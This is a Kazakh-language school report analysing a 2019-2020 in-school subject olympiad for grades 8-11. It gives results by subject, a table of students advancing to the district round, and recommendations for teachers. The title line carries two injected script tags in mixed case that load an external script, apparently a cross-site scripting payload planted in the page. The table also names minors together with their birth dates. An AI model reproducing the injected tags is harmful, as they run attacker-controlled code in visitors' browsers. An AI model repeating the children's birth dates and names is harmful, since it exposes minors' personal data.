Азат ОМ-нің 2019-2020 оқу жылында мектепішілік пән олимпиадасының сараптамалық талдау қорытындысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
25.11.2019
Азат ОМ-нің 2019-2020 оқу жылында мектепішілік пән олимпиадасының сараптамалық талдау қорытындысы
Ақкөл ауданы білім бөлімінің 2019 жылғы 13қарашадағы №325 бұйрығы Азат ОМ-нің 15 қарашадағы №58 бұйрығы негізінде 18-19 қараша күні мектебімізде 8-11 сыныптар арасында мектепішілік пән олимпиадасы өткізілді. 8 -11 сыныптар арасында – 38 оқушы қатысты.
8-11 сыныптарда олимпиадаға гуманитарлық, жаратылыстану- математикалық пәндер бойынша өтті: қазақ тілі мен орыс тілі мен әдебиеті, математика, тарих, физика, география, химия, биология, ағылшын тілі.Олимпиада екі тур бойынша 18-19 қараша күндері сағат 14.00- 17.00 дейін уақытта белгіленді. Мектепішілік олимпиада өткізілетін орны, әр пән бойынша орындау уақыты, кабинеті және жауапты комиссия құрамы бекітілді.
Олимпиада өткізу жұмыс жоспары,кестесіне сай пәндік әдістеме бірлестіктері олимпиада тапсырмаларын дайындады. Мектепішілік олимпиаданы ұйымдастыру және өткiзу ережесімен таныстырылды. Олимпиаданы өткiзудің қажеттi ғылыми-әдiстемелiк деңгейін қамтамасыз ету үшiн пәндер бойынша әдiстемелiк комиссия құрамы құрылды.
Олимпиада өткізудің негізгі мақсаты мен міндеті: оқушылардың оқу-танымдық қабілеттерін ынталандыру,пәндік білімдерін тереңдету, оқушылардың аудандық олимпиадаға қатысуға іріктеу және дайындықтарын пысықтау мақсатында ұйымдастырылды.
Өткізу формалары:шығарма, лексико грамматикалық, тыңдалым, оқылым, жазылым, тестілеу, логикалық тапсырмалар.
Олимпиадаға қатысатын оқушыларға арнайы мөр басылған дәптерлер таратылды.
8-11 сыныптар арасында олимпиадаға 38 оқушыдан 8 оқушы аудандық кезеңге жолдама алды.
Мектепішілік олимпиаданың нәтижелері келесідей:
- қазақ тілі бойынша бірінші орын – 2, екінші орын – 2, үшінші орын – 1;
- орыс тілі бойынша бірінші орын – 1, екінші орын – 2, үшінші орын – 2;
- тарих пәні бойынша бірінші орын – 2, екінші орын – 1, үшінші орын – 1;
-физика пәні бойынша бірінші орын -0, екінші орын-0,үшіншіорын -1;
-биология пәні бойынша бірінші орын – 1, екінші орын – 2, үшінші орын – 1;
-география пәні бойынша бірінші орын – 0,екінші орын – 3, үшінші орын – 0;
- химия пәні бойынша бірінші орын – 1,екінші орын – 0, үшінші орын – 1
- ағылшын тілі бойынша бірінші орын – 1,екінші орын – 0,үшінші орын - 1.
Пән олимпиадасы ұйымдасқан түрде өтті, қорытындысы уақытылы жасалды. Мектепішілік олимпиаданың жүлдегерлерi үшін дипломдар мен мадақтамалар дүйсенбі күнгі ертеңгілік жиында табысталады.
Аудандық олимпиадаға мектебімізден 8-11 сыныптан төмендегі оқушылар қатысады:
|
№ |
Оқушының аты-жөні |
Пәні |
Сынып |
Оқу тілі |
Туған жылы |
Мұғалімі |
|
Дәулетбек Назым |
Қазақ тілі мен әдебиеті |
8А |
Қазақша |
15.05.2006
|
Төлеген Қуаныш
|
|
Нұрмұхамет Эльмира |
Қазақ тілі мен әдебиеті |
9А |
Қазақша |
21.07.2005
|
Семсерхан Сьез |
|
Каиргельдинова Нургуль Бейбитовна |
Орыс тілі мен әдебиеті |
9А |
қазақша |
21.09.2005 |
Молдаганапова Светлана Болатовна |
|
Мұратова Сезім
|
Қазақстан тарихы |
8А |
Қазақша |
18.09.2005
|
Әскерхан Ауғанбай |
|
Еженхан Ерқанат
|
Қазақстан тарихы |
10А |
Қазақша |
22.08.2004
|
Әскерхан Ауғанбай |
|
Тұрсынхан Мұрат |
биология |
11А |
Қазақша |
07.08.2003 |
АншыбайМайрагуль |
|
Камаров Аян
|
химия |
8А |
Қазақша |
01.06.2006
|
Аншыбай Майрагуль |
|
Бупешова Дильназ |
ағылшын тіл |
9А |
Қазақша |
12.12.2004 |
Мурат Дариға |
|
Зареев Руслан |
география |
9б |
орысша |
01.04.2005 |
Абасс Елизавета Эдуардовна |
Қорытындысы мен ұсынысы:
- Пән мұғалімдеріне олимпиада тапсырмаларының құрлымы мен тапсырма күрделігін ескеріп, сабақта және сабақтан тыс уақытта түзету жұмыстары ескерілсін;
- ӘБ жетекшілері мектепішілік және аудандық пән олимпиадасына дайындық жұмыстарын бақылауға алып ,олимпиада тапсырмалары қоры жасақталсын;
- Пән мұғалімдерінің олимпиадаға қатысуға оқушылардың дайындығына бақылау басты назарда ұсталсын;
- Олимпиадаға оқушылардың бірнеше пәндерден қатысуына, оларға ауыр салмақ салмауын пән мұғалімдеріне қосымша дайындық жұмыстарын күшейту ескерілсін;
- Математика,физика,информатика,география,химия пәндерінен оқушылардың аудандық кезеңге олимпиадаға қатысу деңгейі төмен. Аталған пән мұғалімдеріне бұл бағыттағы жұмысты жүйелі түрде дайындықты жандандыруды бақылауға алынсын;
- Мектепішілік олимпиада қатысқан жүлдегер оқушылар марапатталсын.
Оқу ісінің орынбасары Ж.Серікбер